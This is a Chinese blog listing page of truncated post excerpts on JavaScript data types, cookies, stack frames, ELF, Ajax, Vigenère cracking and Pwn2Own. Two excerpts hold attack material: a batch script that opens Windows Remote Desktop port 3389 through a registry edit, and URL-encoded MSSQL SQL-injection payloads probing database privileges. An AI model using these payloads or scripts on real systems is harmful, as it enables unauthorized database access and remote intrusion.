摘要： JavaScript中有5种简单数据类型（也称为基本数据类型）：Undefined、Null、Boolean、Number和String。还有1种复杂数据类型——Object，Object本质上是由一组无序的名值对组成的。　typeof操作符 介于JavaScript是松散类型的，因此需要有一种手段来检测给定变量的数据类型——typeof就是负责提供者方面信息的操作符。对一个值使用typeof操作符可能返回下列某个字符串： ●"undefined"——如果这个值未定义； ● "boolean"——如果这个值是布尔值； ● "string&quo 阅读全文

摘要： 什么是 Cookie “cookie 是存储于访问者的计算机中的变量。每当同一台计算机通过浏览器请求某个页面时，就会发送这个 cookie。你可以使用 JavaScript 来创建和取回 cookie 的值。” -w3school cookie 是访问过的网站创建的文件，用于存储浏览信息，例如个人资料信息。 从JavaScript的角度看，cookie 就是一些字符串信息。这些信息存放在客户端的计算机中，用于客户端计算机与服务器之间传递信息。 在JavaScript中可以通过 document.cookie 来读取或设置这些信息。由于 cookie 多用在客户端和服务端之间进行通信... 阅读全文

摘要： 首先讲解一下栈帧的概念：从逻辑上讲，栈帧就是一个函数执行的环境：函数参数、函数的局部变量、函数执行完后返回到哪里等等。实现上有硬件方式和软件方式(有些体系不支持硬件栈)首先应该明白，栈是从高地址向低地址延伸的。每个函数的每次调用，都有它自己独立的一个栈帧，这个栈帧中维持着所需要的各种信息。寄存器ebp指向当前的栈帧的底部（高地址），寄存器esp指向当前的栈帧的顶部（低地址）。注意：EBP指向当前位于系统栈最上边一个栈帧的底部，而不是系统栈的底部。严格说来，“栈帧底部”和“栈底”是不同的概念;ESP所指的栈帧顶部和系统栈的顶部是同一个位置。三者区别一览表：__stdcall__cdecl__fa 阅读全文

摘要： 开启3389：@echo offtitle 开启3389clsrem 开启3389reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f >nulecho.echo 提示你：3389已经开启关闭3389：echo rem 关闭3389reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Term 阅读全文

摘要： //看看是什么权限的and1=(SelectIS_MEMBER('db_owner'))Andchar(124)%2BCast(IS_MEMBER('db_owner')asvarchar(1))%2Bchar(124)=1;--//检测是否有读取某数据库的权限and1=(SelectHAS_DBACCESS('master'))Andchar(124)%2BCast(HAS_DBACCESS('master')asvarchar(1))%2Bchar(124)=1--数字类型andchar(124)%2Buser%2Bchar( 阅读全文

摘要： 维吉尼亚密码以破译复杂、工作烦琐而闻名，令众多破译者望而却步。但是破译的方法还是有的，由于工作量较大，所以一般借助一些破解工具。由于不是一次一密乱码本作为的密钥，所以密钥的长度都是有限的，所以当密文越长时，我们破解出密码的可能性就越大。破解方法以下题为例：cgrpfrvanxsnycznbjqana首先假设密钥的长度，我们从2开始（如果密钥长度是1的话，维吉尼亚密码就变成了恺撒密码了）。假设密钥长为2。以两个字母为一组加上空格：cg rp fr va nx sn yc zn bj qa na再进行恺撒全排：A cg rp fr va nx sn yc zn bj qa naZ dh sq gs 阅读全文

摘要： ELF(Executable and Linking Format)是一种对象文件的格式，用于定义不同类型的对象文件(Object files)中都放了什么东西、以及都以什么样的格式去放这些东西。它自最早在 System V 系统上出现后，被 xNIX 世界所广泛接受，作为缺省的二进制文件格式来使用。可以说，ELF是构成众多xNIX系统的基础之一，所以作为嵌入式Linux系统乃至内核驱动程序开发人员，你最好熟悉并掌握它。其实，关于ELF这个主题，网络上已经有相当多的文章存在，但是其介绍的内容比较分散，使得初学者不太容易从中得到一个系统性的认识。为了帮助大家学习，我这里打算写一系列连贯的文章来介 阅读全文

摘要： Ajax技术的核心是XMLHttpRequest对象（简称XHR），可以通过使用XHR对象获取到服务器的数据，然后再通过DOM将数据插入到页面中呈现。虽然名字中包含XML，但Ajax通讯与数据格式无关，所以我们的数据格式可以是XML或JSON等格式。 XMLHttpRequest对象用于在后台与服务器交换数据，具体作用如下：在不重新加载页面的情况下更新网页在页面已加载后从服务器请求数据在页面已加载后从服务器接收数据在后台向服务器发送数据 本文目录：XMLHttpRequest的用法Ajax同源请求同源策略与跨源策略Ajax跨源请求 1.1.2 正文 XMLHttpReques... 阅读全文

摘要： Pwn2Own是全球最著名的黑客大赛之一，由美国五角大楼入侵防护系统供应商TippingPoint的DVLabs赞助，今年已经是第六届。1比赛规则参赛黑客们的目标是4大主流网页浏览器——IE、Firefox、Chrome和Safari，平台是在安装安全更新的Windows 7操作系统下运行，Safari浏览器将在安装苹果Mac OS X 10.6雪豹操作系统下运作，顺利攻破一个主流浏览器便奖励1万美元，共4万美元。为了增加比赛难度，参加黑客竞赛的参赛者不准使用Adobe Flash等第三方外挂。这些第三方外挂一直都是操作系统中的安全弱项，破解专家Charlie Miller说只要浏览器装有Ja 阅读全文

摘要： “昏暗的室内，一人打开笔记本电脑，双手迅速在键盘上飞舞，屏幕上一排排字符快速滚动。没过多久，‘滴’的一声，系统提示成功进入，机密信息瞬间到手。他嘴角稍稍上扬，合上电脑，消失在夜幕中……”这是影视作品中经常呈现的黑客形象，很酷很拉风有木有？那么，现实中的顶尖黑客究竟是什么样子？他们的生活真的和常人有所 阅读全文